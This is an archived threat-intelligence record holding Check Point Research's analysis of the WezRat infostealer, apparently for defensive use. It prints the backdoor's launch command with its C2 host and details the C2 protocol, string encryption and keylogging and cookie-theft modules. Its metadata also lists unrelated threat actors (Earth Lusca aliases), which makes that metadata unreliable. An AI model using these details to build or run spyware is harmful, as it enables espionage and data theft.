{ "id": "851289f7-b9b3-4a14-99ae-67cbacec75e0", "created_at": "2026-04-06T03:36:31.319641Z", "updated_at": "2026-04-10T13:12:47.186703Z", "deleted_at": null, "sha1_hash": "38686cc38695ac4bfcd79c2708c65c6eee2056d6", "title": "Malware Spotlight:  A Deep-Dive Analysis of WezRat", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 135038, "plain_text": "Malware Spotlight:  A Deep-Dive Analysis of WezRat\r\nBy samanthar@checkpoint.com\r\nPublished: 2024-11-14 · Archived: 2026-04-06 03:31:35 UTC\r\nKey Findings:\r\nCheck Point Research (CPR) provides a comprehensive analysis of a custom modular infostealer, tracked as WezRat,\r\nafter the FBI, the US Department of Treasury, and the Israeli National Cybersecurity Directorate (INCD) released a\r\njoint Cybersecurity Advisory and attributed the malware to the Iranian cyber group Emennet Pasargad. The group has\r\nbeen held responsible for several recent cyber operations in the US, France, Sweden, and Israel.\r\nThe latest version of WezRat was recently distributed to multiple Israeli organizations in a wave of emails\r\nimpersonating the Israeli National Cyber Directorate (INCD). WezRat can execute commands, take screenshots,\r\nupload files, perform keylogging, and steal clipboard content and cookie files. Some functions are performed by\r\nseparate modules retrieved from the command and control (C\u0026C) server in the form of DLL files, making the\r\nbackdoor’s main component less suspicious.\r\nAnalysis of the malware versions led to the discovery of partial source code for the backend of WezRat. Further\r\ninvestigation of WezRat and its backend suggests that different individuals may be responsible for its development\r\nand operation.\r\nThe malware has been active for over a year; it has not yet been publicly analyzed or attributed to any group. During\r\nthis time, WezRat gained additional modules, and its backend infrastructure has undergone various changes.\r\nIntroduction\r\nOn October 30th, the FBI, the US Department of Treasury, and the Israeli National Cybersecurity Directorate (INCD)\r\nreleased a joint Cybersecurity Advisory regarding recent activities of the Iranian cyber group Emennet Pasargad. The group\r\nrecently operated under the name Aria Sepehr Ayandehsazan (ASA) and is affiliated with the Iranian Islamic Revolutionary\r\nGuard Corps (IRGC). The advisory details operations that have impacted various countries, including the US, France, Israel,\r\nand Sweden.\r\nThe following is a timeline of these activities:\r\nIn mid-2023, the group, operating under the Anzu Team persona, hacked a Swedish SMS service and distributed\r\nmessages calling for the revenge of those responsible for the Quran burnings that took place throughout the year.\r\nIn December 2023, the group operating as For-Humanity, gained unauthorized access to a U.S.-based IPTV\r\nstreaming company to broadcast tailored messages regarding the Israel-HAMAS conflict.\r\nIn mid-2024, the group launched a cyber-enabled disinformation campaign during the Summer Olympics. They\r\nhacked a French display provider to show images denouncing the participation of Israeli athletes. Additionally, they\r\nsent threats to Israeli athletes under the banner of the fake far-right group Regiment GUD, impersonating the actual\r\nFrench group GUD.\r\nThroughout 2023 and 2024, the group carried out multiple influence operations in Israel using various cover\r\npersonas, including Cyber Flood, Contact-HSTG, and Cyber Court.\r\nThe advisory also attributed a few malware hashes to the group. Check Point Research tracks this malware family as\r\nWezRat. Recently, we identified the latest version of WezRat being distributed in a large-scale phishing campaign that\r\nimpersonates the INCD and targets Israeli organizations.\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 1 of 15\n\nThis publication provides a technical analysis of the campaign and the malware. WezRat was deployed for over a year,\r\nduring which the malware’s architecture evolved significantly, impacting both the client and server sides.\r\nFake Google Chrome Update campaign\r\nOn October 21, 2024, multiple emails impersonating the Israeli National Cyber Directorate (INCD) were sent to various\r\nIsraeli organizations. These emails were sent from the fraudulent address  alert@il-cert[.]net  and warned recipients of\r\nan urgent necessity to update their Chrome browser.\r\nFigure 1 - Phishing email sent to Israeli recipients.\r\nFigure 1 – Phishing email sent to Israeli recipients.\r\nThe email included a link that appeared to direct users to the legitimate INCD site,  il-cert.org.il , but in fact, led to a\r\nlookalike domain,  il-cert[.]net . From there, victims would automatically download a file named  Google Chrome\r\nInstaller.msi  and then be redirected to the legitimate INCD website.\r\nThe downloaded MSI contains the legitimate Google Chrome installer and related files, but it also drops a backdoor\r\nnamed  Updater.exe  and executes it with two arguments:\r\n\"C:\\Program Files (x86)\\Google\\Update\\Updater.exe\" connect.il-cert.net 8765\r\nFor persistence, the MSI also adds the Run registry key called  Chrome Updater , which executes the same command.\r\nFigure 2 - Infection chain delivering WezRat.\r\nFigure 2 – Infection chain delivering WezRat.\r\nThe payload in this campaign,  Updater.exe , is the latest version of the group’s custom infostealer, WezRat.\r\nWezRat Analysis\r\nWezRat is written in C++. We observed two samples of the backdoor recently used. The primary difference between them is\r\nusing OLLVM common obfuscation techniques such as opaque predicates and control flow flattening. The obfuscated\r\nvariant also supports fewer commands. We provide an analysis of the latest non-obfuscated version with full command\r\nsupport (md5: 6b0d7b2e422a93e81ceed3645d36dd40, internally called bd.exe).\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 2 of 15\n\nFigure 3 – The difference between the two Updater.exe samples: OLLVM obfuscation (on the left) vs its\r\nabsence (on the right, sample with pdb path C:\\Users\\PC\\source\\repos\\bd\\Release\\bd.pdb).\r\nThe backdoor is executed with two parameters:  connect.il-cert.net 8765 , which represents the C\u0026C server, and a\r\nnumber used as a “password” to enable the correct execution of the backdoor. After parsing the arguments, the backdoor\r\ncalculates an offset pointing to a function responsible for handling the C\u0026C connection and parsing the commands. It then\r\nsubtracts the expected number,  8765 , from this offset and adds the argument provided as a “password.” If an incorrect\r\nnumber is supplied, the offset will not align with the intended function, causing the backdoor to execute an incorrect\r\nfunction or potentially crash.\r\nFigure 4 – Subtraction of the offset.\r\nOnce the C\u0026C connection logic function is executed, the backdoor imports needed DLLs, resolves imports used for\r\nenumeration of the system, networking, etc., and creates a mutex named  {FA531CC1-0497-11D3-A180-00105A276C3E} .\r\nThis mutex has been featured in code examples on various coding forums for years, dating back to at least 2005. It has been\r\nutilized since earlier versions of WezRat. Reusing unchanged forum code for basic tasks, such as limiting the number of\r\nsimultaneously running instances, could indicate a beginner developer, particularly in the initial stages of the malware’s\r\ndevelopment.\r\nCollecting initial data from the infected machine\r\nThe backdoor collects the following system information:\r\nUser profile path via environment variables – used later for saving the additional modules\r\nLocal machine IP\r\nComputer name\r\nUsername\r\nThe backdoor combines the IP, computer name, and username to calculate the bot ID using the FNV-1a (Fowler–Noll—Vo)\r\nhashing algorithm. It employs the 64-bit version of the algorithm but only utilizes the lower 32-bits. Then it combines eight\r\nzeroes with the FNV hash, resulting in a format like  00000000da635cc5 , and stored it as  md5 . Although this value is not\r\nactually computed using the MD5 algorithm, earlier versions of WezRat (which will be discussed later) used the MD5 hash\r\nalgorithm for the calculation of the bot ID. This may be a strategy to evade triggering certain defenses by omitting the more\r\ncommonly recognized use of MD5, instead opting for FNV.\r\nBased on all the gathered information about the victim, the backdoor prepares the following JSON:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 3 of 15\n\nEnlighterJS 3 Syntax Highlighter\r\n{\"md5\":\"[bot ID]\",\"computerName\":\"[Machine name]\",\"userName\":\"[User name]\",\"ip\":\"[IP address]\",\"os\":\"Windows\"}\r\n{\"md5\":\"[bot ID]\",\"computerName\":\"[Machine name]\",\"userName\":\"[User name]\",\"ip\":\"[IP address]\",\"os\":\"Windows\"}\r\n{\"md5\":\"[bot ID]\",\"computerName\":\"[Machine name]\",\"userName\":\"[User name]\",\"ip\":\"[IP address]\",\"os\":\"Windows\"}\r\nNetwork Communication\r\nRegistering the bot with the C2 server\r\nThe initial network request to the C2 server contains the previously mentioned JSON with user information and is sent to the\r\nAPI endpoint:  /wez/Agent/InsMch . This endpoint, “Insert Machine,” registers the machine with the C2 server. Upon\r\nsuccessfully processingthe new bot, the server responds with the string  true;  however, the backdoor disregards this\r\nreturned value from the server.\r\nSet up sleep intervals\r\nFollowing registering the newly infected machine with the C2 server, the backdoor subsequently sends a request to\r\nthe  /sleep/[MD5]  API endpoint. The response from the C2 server is then multiplied by 1000 and used as the number of\r\nseconds the backdoor sleeps between requests to the C2 server (60 seconds in cases we observed).\r\nCommand retrieval loop\r\nTo retrieve commands from the C2 server, the malware sends a request to the  /Read/[MD5]  API endpoint using the POST\r\nmethod with the data  q=[MD5] . The server can respond with an encrypted string representing the command:\r\n[Encrypted command name]\u003e[Command value]\u003c[Request ID] .\r\nFor example,  101094087087098\u003e60\u003c26  which represents  ohaal\u003e60\u003c26 .\r\nThe following JSON represents responses sent back (unencrypted) to the C2 server:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n{ \"id\":[Request ID],\"md5\" : \"[MD5]\",\"response\" : \"[Response based on the command]\"}\r\n{ \"id\":[Request ID],\"md5\" : \"[MD5]\",\"response\" : \"[Response based on the command]\"}\r\n{ \"id\":[Request ID],\"md5\" : \"[MD5]\",\"response\" : \"[Response based on the command]\"}\r\nWezRat supports the following commands:\r\nohaal  updates the sleep timer. The backdoor checks the received value, and if it is different than the current sleep\r\ntime, it sends back a response to the C2 server API endpoint  /wez/Agent/UpSl , indicating the sleep timer has been\r\nupdated. This command is also used as a keepalive / do nothing command. The backdoor does nothing when the\r\ntimer doesn’t require changing.\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 4 of 15\n\nchangedomain  adds another C2 for the backdoor to communicate with in case the original one goes down. Despite\r\nthe name, this won’t overwrite the current domain; it will only be added to the list and queried if requests to the\r\nprevious C2 fail. The backdoor responds with an API request to the  /wez/Agent/UpChd  endpoint.\r\ncommand  executes a command and sends the command response to the  /wez/Agent/UpCmd  API endpoint. If the\r\ncommand sent by C2 is incorrect, the backdoor will respond with a string reminding the malware operators of the\r\nexpected format:  cmd.exe /c \u003cyour command\u003e . The operators can also send the  mydir  command (instead of a cmd\r\ncommand), which causes the backdoor to download and save the  mvpis.dll  from the server. Then, the backdoor\r\nloads  the dll \u003e into the program, resolves the  GetContent  export, calls it, and returns the response to the server.\r\nupload  downloads and saves  JumpViewUi.dll  from the server, loads it into the program, resolves the  up  export,\r\nand calls it using the following parameters: C2 address, arguments from the upload command,  upFile/  endpoint to\r\nsend the reply to, and the request ID.\r\nscreenshot  downloads and saves  STITP.dll  from the server, loads it into the program, and resolves\r\nthe  scj  export. The resulting screenshot is saved to the  Pictures/Screenshots  folder under the current user and\r\nthen uploaded to the server using the  JumpViewUi.dll .\r\nEKeyLogger  downloads and saves  TaskFlowUi.dll  from the server, loads it into the program, resolves\r\nthe  threadKL  export, and begins a new thread running the  threadKL  function. While the keylogger thread is\r\nrunning, any other command except for  EKeyLogger  received from the C2 server will cause termination of the\r\nkeylogger thread. Keystrokes are saved to the  AppData\\Local\\Temp\\10105060.txt  file, and once the thread is\r\nterminated, the file is sent to the  /kylog/  API endpoint on the C2 server.\r\ndwnfile  downloads a file from the C2 server: the file name is appended to the C2 URL, and the file is downloaded\r\nand saved to the  appdata/local/temp  folder.\r\ndwnclipboard  downloads and saves  clp.dll  from the server, loads it into the program, and resolves two\r\nexports,  GetClipboardText  and  FreeClipboardText . These two functions retrieve the clipboard data, which is then\r\nfreed and sent to the C2 server.\r\nSndcoockie  (note that the misspelling was made by threat actors) downloads and saves the  JumpViewUi.dll  from\r\nthe server, loads it into the program, and resolves the  up  export. It grabs SQLite cookie files from major\r\nChromium-based browsers and uploads them to the server using the resolved export.\r\nThe DLL modules mentioned above are analyzed in the following section.\r\nAfter executing each command received from the C2, the backdoor calls the  /wez/Agent/InsMch  API endpoint again as a\r\nmeans of keep-alive. It then receives another command from the  /Read/  API endpoint and continues indefinitely. All\r\nnetwork requests to the C2 server use the  firefox  user agent.\r\nString and Command Encryption\r\nThe backdoor uses a simple string encryption. Each character in the string is converted to its ASCII decimal value, reduced\r\nby 10, and then formatted to a three-digit number by adding a leading zero if needed.\r\nFor example, the string encrypted representation of the string  USERPROFILE  is  075073059072070072069060063066059 .\r\nThe decryption process is simple: split the strings into three-digit segments, add 10 to each, and then convert each part to a\r\ncharacter.\r\nWe’ve noticed that some strings in the C2 commands, such as  command , are decremented by 14 instead of 10. It doesn’t\r\naffect the backdoor execution as it compares received commands in encrypted form but instead suggests these are artifacts\r\nleft from older versions.\r\nError handling / Debug strings\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 5 of 15\n\nThe backdoor’s exception handlers include random phrases to modify the result of  GetLastError  function, allowing it to\r\nreturn a string or parts of it. We found no practical use for those modifications, as the errors are not reported back to the\r\nserver. They could simply be leftover debug information or a means for operatives to identify errors while testing and using\r\nthe backdoor, without disclosing its malicious intent.\r\nFigure 5 – Exception handlers using the error handling strings.\r\nDLL modules\r\nAs detailed before, to execute specific C2 commands, additional DLLs must be downloaded from the C2 server. These\r\nDLLs are stored in the  appdata/local/temp  directory, loaded into the program, and then a specific export is executed. In\r\ntotal, five DLLs are used in the WezRat sample deployed in the campaign impersonating INCD. We could not obtain these\r\nmodules from the C2 server during our analysis, as it was only active for a brief period. However, by tracking potential\r\ninfrastructure used by threat actors, we identified a new C2 server set up by the actor in early November, and we\r\nsuccessfully retrieved the modules.\r\nWhile the URLs and functionality of these DLLs mostly aligned with our expectations, the DLL and export names differed\r\nin some cases. The actors likely not only improved the modules’ code over time but also varied the export names to give\r\neach DLL unique characteristics. Additionally, some DLLs include obfuscation and use the same string obfuscation\r\ntechniques as the main backdoor.\r\nAlthough we could not retrieve a payload from the  Download/3  endpoint, which was expected to provide the DLL handling\r\nthe mydir command, the server did contain an additional DLL at the  Download/6   named persist.dll. This DLL handles\r\npersistence but was not referenced in the sample we analyzed, as persistence was managed by its MSI installer.\r\nBelow is a summary comparing the expected modules with those retrieved from the actor-controlled server:\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 6 of 15\n\nEndpoint\r\nModule\r\nfunctionality\r\nModule/ export\r\nname (from the\r\nsample)\r\nDLL/export name\r\n(from another C2\r\nserver)\r\nOLLVM\r\nobfuscation\r\nString\r\nobfuscation\r\nCompilation\r\ntimestamp\r\n(UTC)\r\nDownload/0\r\nTake\r\nscreenshot\r\nSPITP.dll (scj) scDll.dll (scsh)\r\nOct 21,\r\n2024,\r\n12:26:16\r\nDownload/1 Keylogger\r\nTaskFlowUi.dll\r\n(threadKL)\r\nklDll.dll\r\n(threadKL)\r\nV V\r\nOct 27,\r\n2024,\r\n07:39:14\r\nDownload/2\r\nUpload file\r\nto the server\r\nJumpViewUi.dll\r\n(up)\r\nupDll.dll (up) V V\r\nOct 27,\r\n2024,\r\n07:41:59\r\nDownload/3\r\nPerform\r\nmydir\r\ncommand\r\nmvpis.dll\r\n(GetContent)\r\n– – – –\r\nDownload/4\r\nGet\r\nclipboard\r\ndata\r\nclp.dll\r\n(GetClipboardText,\r\nFreeClipboardText)\r\nclbDll.dll\r\n(GetClipboardText,\r\nFreeClipboardText)\r\nOct 16,\r\n2024,\r\n06:18:18\r\nDownload/6\r\nSet up\r\npersistence\r\n–\r\npersist.dll\r\n(MainFunc)\r\nNov 04,\r\n2024,\r\n07:43:51\r\nScreenshot module – scDll.dll\r\nThe arguments in this DLL are slightly different than what we expected from the WezRat code. In this version, the DLL\r\naccepts two arguments: result and target directory. When the DLL is loaded, and the export scsh is called, it resolves APIs\r\ncommonly used for taking screenshots:\r\nFigure 6 – Windows API used in screenshot capture module.\r\nThe result BMP image name is generated using random numbers:\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 7 of 15\n\nFigure 7 – Generation of the image name using calls to random and some manipulations on generated\r\nnumbers.\r\nThe module combines the target directory provided as an argument with the generated bmp name, saves the screenshot to\r\nthe resulted path, copies the result image path to the first argument, and returns it to the main backdoor.\r\nKeylogger – klDll.dll\r\nThe keylogger DLL starts from the threadKL export and utilizes the Windows APIs that are commonly used to capture\r\nkeystrokes, such as SetWindowsHookExA, CallNextHookEx, GetKeyState, and GetAsyncKeyState.\r\nThen, it starts a thread that goes over the results of the key state functions and writes them to a file\r\nAppData\\Local\\Temp\\10105060.txt .\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 8 of 15\n\nFigure 8 – Part of the keylogger code.\r\nFile upload – upDLL.dll\r\nThe primary purpose of the DLL is to upload files to the C2 server. It is called by the up export, with four arguments: the C2\r\nserver address, the path on C2 server, the path to the file to exfiltrate, and the upload name.\r\nThe file is sent to the C2 server in a POST request using User-Agent edge :\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 9 of 15\n\nGet clipboard data – clbDLL.dll\r\nThis module also uses common Windows APIs to get clipboard data:\r\nFigure 9 – Windows API used by the clipboard module.\r\nGetClipboardText export resolves the aforementioned DLLs and exports. It then calls OpenClipboard to open the\r\nclipboard and gain access to its contents, uses GetClipboardData to retrieve a handle to the data, uses this handle (with\r\nGlobalLock to lock the data into memory) to read the clipboard contents into the buffer, and returns them to the caller.\r\nFreeClipboardText export is then used to free a buffer received as an argument.\r\nPersistence module – persist.dll\r\nThe sole purpose of this DLL is to establish persistence by adding a registry key under\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run .\r\nThe DLL has a single export named MainFunc which requires 2 arguments: the path to the program to run and arguments to\r\nrun it with. The provided values are then used as the values for a newly created registry key called Updater .\r\nThreat actors likely use this DLL to enable WezRat persistence, particularly in infection chains that haven’t yet established\r\npersistence, as WezRat itself lacks built-in persistence mechanisms.\r\nOlder versions and WezRat evolution\r\nThe earliest sample of WezRat we identified was compiled on August 30, 2023, and uploaded to Virus Total on September 1,\r\n2023. It was aptly named  first.exe .\r\nThe earlier versions of WezRat had hardcoded C2 server addresses and didn’t rely on “password” argument to run. String\r\nencryption uses the same algorithm in all the versions.\r\nData collected on the infected machine by  first.exe  is similar and contains the computer name, username, and local IPv4.\r\nIn this version, the data is combined, and the  md5  field (bot ID) is calculated using actual MD5 and not FNV. In terms of its\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 10 of 15\n\nAPI, it functions similarly to the latest version. A newly infected machine is registered with the C2 using\r\nthe  /wez/insert  endpoint. For command execution, the system uses the  /api/  endpoint to receive commands,\r\nthe  /api2/  to retrieve data for command execution, and then again to send the results of the executed command.\r\nThroughout the various samples, the available commands are:\r\nCommand Name Command Action\r\nsleep Update the sleep time between requests\r\ncommand Execute a command and return the results\r\ndirr List a directory and return the results\r\ndownload Upload a file to the C2\r\nuploading Download a file from the C2\r\nlibrary Receive a DLL from the C2 server to directly load into memory\r\nexecute Execute a process\r\nchangedomain Add another C2 address to attempt to communicate with\r\nWezRat capabilities evolution\r\nIn addition to  first.exe , we found more samples from various dates active towards the end of 2023 to the beginning of\r\n2024. Judging by the remaining artifacts, they were used in different infection chains. For\r\nexample,  afwpmz.exe  and  users.dll  have close compilation dates, the same functionality, and even the same C2 server.\r\nHowever,  users.dll  is compiled as DLL (pdb path:  E:\\w2\\Back - Copy (2)\\x64\\Release\\Dll1.pdb ),\r\nand  afwpmz.exe  seems to run persistently from the Startup folder.\r\nThe commands shared among all samples include sleep/ohaal, command and changedomain, and the presence of others\r\nvaries depending on the sample and the context in which they were used. The “password” for running the sample correctly\r\nwas first added in the  One_Drive.exe  sample, created at the end of January 2024.\r\nSummary of the supported commands across various samples of WezRat, along with their compilation dates:\r\nCommand\r\nfirst.exe \r\n(2023-\r\n08-30)\r\nafwpmz.exe \r\n(2023-11-23)\r\nusers.dll \r\n(2023-\r\n11-25)\r\nOne_Drive.exe\r\n(2024-01-28)\r\nUpdater.exe\r\n/ bd.exe \r\n(2024-10-\r\n15)\r\nUpdater.exe\r\nwith ollvm \r\n(2024-10-\r\n17)\r\nsleep V V V V V V\r\ncommand V V V V V V\r\ndirr V V V V\r\ndownload V V\r\nuploading V V V\r\nlibrary V\r\nexecute V\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 11 of 15\n\nCommand\r\nfirst.exe \r\n(2023-\r\n08-30)\r\nafwpmz.exe \r\n(2023-11-23)\r\nusers.dll \r\n(2023-\r\n11-25)\r\nOne_Drive.exe\r\n(2024-01-28)\r\nUpdater.exe\r\n/ bd.exe \r\n(2024-10-\r\n15)\r\nUpdater.exe\r\nwith ollvm \r\n(2024-10-\r\n17)\r\nchangedomain V V V V V V\r\nscreenshot V V\r\nkeylogger V V\r\ndwnclipboard V\r\nsndcookie V\r\nWezRat initially functioned more as a simple Remote Access Trojan with basic commands. Over time, additional features\r\nsuch as screenshot capabilities and a keylogger were incorporated and handled as separate commands. We believe that these\r\nfeatures rely on the code of DLLs already utilized by the threat actors, possibly accessed through the  library command.\r\nSocket-based Samples\r\nIn May 2024, another set of samples was uploaded to Virus Total. These samples feature the same string obfuscation and\r\nsimilar error handling with random phrases, but they are significantly different from WezRat. Those samples have the pdb\r\npath  C:\\Users\\Administrator\\Desktop\\Socket-Client\\Socket-Client\\x64\\Release\\Socket-Client.pdb  and use raw\r\nsocket communication instead of HTTP/S.\r\nThe samples lack features like mutex creation or user profiling, which are present in WezRat, and have only one capability:\r\ncommand execution, acting like a reverse shell. Socket-based samples require three arguments: C2 address, port, and\r\n“password,” acting similarly to WezRat, with the primary logic function having its correct offset relying on the correct\r\npassword.\r\nUpon connecting to the C2 server, the malware sends it the string  Init\u003csep\u003eWindows  and expects any response other\r\nthan  No . The server can then respond with the following string  [command id]\u003csep\u003e[command to execute] . Similarly to\r\nWezRAT, if the operator forgets how to run commands, the sample responds with the string  cmd.exe /c \u003cyour command\u003e .\r\nFigure 10 - Command execution by the socket-based sample.\r\nFigure 10 – Command execution by the socket-based sample.\r\nThe sudden shift to such a simple tool is unclear to us. As we have never observed these samples used in the wild, we can\r\nonly speculate whether these are tests of a new approach or attempts to overcome detections in specific environments.\r\nA sneak peek into the C2\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 12 of 15\n\nFigure 11 – Opendir on WezRat C2 server.\r\nIn late 2023, one of the WezRat C2 servers, 46.249.58[.]136, contained an opendir that provided visibility into the inner\r\nworkings and source code of the WezRat’s backend and its panel UI for operators:\r\nFigure 12 – Contents of /commandPage.html showing the operator’s UI for old versions of WezRat.\r\nFigure 13- A simple UI to run a command for a specific machine.\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 13 of 15\n\nThe backend code used to be written in JavaScript, specifically for Node.js, and all data is stored and manipulated in\r\nMySQL database:\r\nFigure 14- Part of the initialization code on the C2 server\r\nFigure 15 – Part of the C2 backend code.\r\nIt’s likely that after the source code was “leaked” the threat actors needed to rewrite it. Over time, we observe changes in\r\nAPI Endpoints. Based on the characteristics of C2 servers in the newer versions, the backend of WezRat moved to Kestrel\r\naround March 2024.\r\nDue to specific error handling in the backdoor code, hints on how to run commands correctly, and the overall UI of the\r\npanel, we suspect there are at least two teams behind this campaign: one in charge of the development and the other is in\r\ncharge of operating the backdoor.\r\nConclusion\r\nIn this article, we analyzed the modules and the evolution of the WezRat backdoor, which has been used by Emennet\r\nPasargad for over a year as reported by the IC3 advisory. Recent versions of WezRat feature a stealthier operation mode,\r\nachieved by dividing the backdoor into separate modules DLLs. Additionally, the backdoor has gained more infostealer\r\nfunctions.\r\nThe ongoing development and refinement of WezRat indicates a dedicated investment in maintaining a versatile and evasive\r\ntool for cyber espionage. Emennet Pasargad’s activities target various entities across the United States, Europe, and the\r\nMiddle East, posing a threat not only to direct political adversaries but also to any group or individual with influence over\r\nIran’s international or domestic narrative.\r\nProtections\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 14 of 15\n\nCheck Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file-types, and\r\noperating systems and protect against the type of attacks and threats described in this report.\r\nHarmony Endpoint\r\nBehavioral.Win.FakeChrome.B\r\nThreat Emulation\r\nTrojan.Wins.FakeUpdater.A\r\nIOCs\r\nSHA256\r\n66b08e55d11f49493118e8a6cab1bb5f1953b2a4784a38c64cf7ed02bf781713\r\n53055662aeca79a319c8c59194f25bae1b33eab1a39cf18e8daa3602fbca900e\r\nb96fad26fba197302fd11e1771e996387b7b23c2560e08f20c69069e173c7fa7\r\n2cf3cd8b7df4e87ac17812511510a48be4a9546fed513b9204c7173364db7ae3\r\ncf12b2043a05729839a29ff4bd23b4088888da1153ca81040a6c048417254a36\r\n26f66196c463e6ec1f224d9f87c1f75d868c94bba5c8502b6cbe806e06614377\r\ne37b95bb9bee64cc0313eaad8a0269493745f89413bd78b58bb3b479b36084ae\r\n84366a894120d4a8c83411925ef04de52fa56da6fad0023a71f71a9bf21259ad\r\n4431b2a4d7758907f81fb1a0c1e36b2ce03e08d43123b1c398487770afd20727\r\ne1a5696dcae33657fd0aa2d1e7a36b84c4647975dab3063ac2f42c19dae0a5a1\r\n5c03ac7128fb6e8ad923897e3696e08c943f4c819e5c1bdbe3df2b5774692d3d\r\n5e33c4a38c05f52918ffd4e49fd2d1b1a771010466ceb19eaf378daa02f71700\r\n898595a6646b94f9735442ae65deb5f5364eddf2a7008f66e9d7ee8b6c08c285\r\n629dc03888412ae39d50cc17d5cbe579f2a99be03e6af2f071e68b7226f891d0\r\n48a97f6aee23543909fc1b7341dff8aa0f1caba229d61d3b0de4e03df02b1ac0\r\nServers\r\nil-cert[.]net\r\nconnect.il-cert[.]net\r\nonlinelive[.]info\r\n45.143.167[.]87\r\n194.11.226[.]9\r\n45.120.177[.]8\r\n194.4.49[.]175\r\n46.249.58[.]136\r\nSource: https://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://research.checkpoint.com/2024/wezrat-malware-deep-dive/" ], "report_names": [ "wezrat-malware-deep-dive" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "07131850-5161-48b8-98be-6b0271d44d0e", "created_at": "2024-01-23T13:22:35.085803Z", "updated_at": "2026-04-10T02:00:03.521854Z", "deleted_at": null, "main_name": "Cotton Sandstorm", "aliases": [ "Emennet Pasargad", "Holy Souls", "MARNANBRIDGE", "NEPTUNIUM", "HAYWIRE KITTEN" ], "source_name": "MISPGALAXY:Cotton Sandstorm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775446591, "ts_updated_at": 1775826767, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/38686cc38695ac4bfcd79c2708c65c6eee2056d6.pdf", "text": "https://archive.orkl.eu/38686cc38695ac4bfcd79c2708c65c6eee2056d6.txt", "img": "https://archive.orkl.eu/38686cc38695ac4bfcd79c2708c65c6eee2056d6.jpg" } }